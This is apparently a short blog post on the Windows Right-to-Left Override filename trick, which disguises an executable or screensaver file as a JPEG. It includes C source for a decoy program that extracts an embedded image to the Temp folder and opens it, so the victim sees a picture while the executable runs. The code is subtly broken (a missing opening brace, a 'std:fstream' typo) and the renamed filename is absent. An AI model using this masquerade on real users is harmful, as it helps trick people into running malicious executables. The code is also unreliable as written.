Windows RLO Vulnerability

So there's an interesting bug in Windows when using the U+202E unicode Right-to-Left Override [RLO] character in a filename. You can essentially make a dangerous file masquerade as something harmless like an image file.

As a proof of concept look at the following example. Here we have a perfectly innocent meme called Narcs.jpg. We embed it as a resource in a simple C application.

#include <windows.h>
#include <fstream.h>
#include <tchar.h>
#include "resource.h"

#define BUFSIZE 65536

#define countof(array) (sizeof(array)/sizeof(array[0]))

void Debug(LPCTSTR szFormat, ...);

int CALLBACK WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
    DWORD dwRetVal;
    DWORD dwBufSize = BUFSIZE;
    WCHAR lpPathBuffer[BUFSIZE];
    CHAR lpPath[BUFSIZE];

    dwRetVal = GetTempPath(dwBufSize, lpPathBuffer);

    _tcscat(lpPathBuffer, L"Narcs.jpg");
    wcstombs(lpPath, lpPathBuffer, BUFSIZE - 1);

    HRSRC hrSrc = FindResource(hInstance, MAKEINTRESOURCE(IDR_JPEG1), TEXT("JPG"));

    if (!hrSrc)
        return 0;

    HGLOBAL hJpeg = LoadResource(hInstance, hrSrc);

    if (!hJpeg)
        return 0;

    DWORD jpegSize = SizeofResource(hInstance, hrSrc);

    if (!jpegSize)
        return 0;

    unsigned char* jpegData = (unsigned char*)LockResource(hJpeg);

    if (!jpegData)
        return 0;

    std:fstream outputFile(lpPath, ios::out | ios::binary);

    outputFile.write(jpegData, jpegSize);


    ShellExecute(NULL, NULL, lpPathBuffer, NULL, NULL, SW_SHOWNORMAL);

    return 0;

It's compiled to Narcs.exe. The trick now is to rename it like so:

Now the file will appear to be named Narcs.jpg but upon launch will run and extract the Narcs.jpg to the Temp folder and display it using the default Shell application associated with jpegs. The problem here is a screensaver file (extension .scr) is essentially an executable and can now do whatever nafarious things it likes.

Thankfully Microsoft is aware of this issue and Windows Defender will now detect and quaranteen such a file immediately.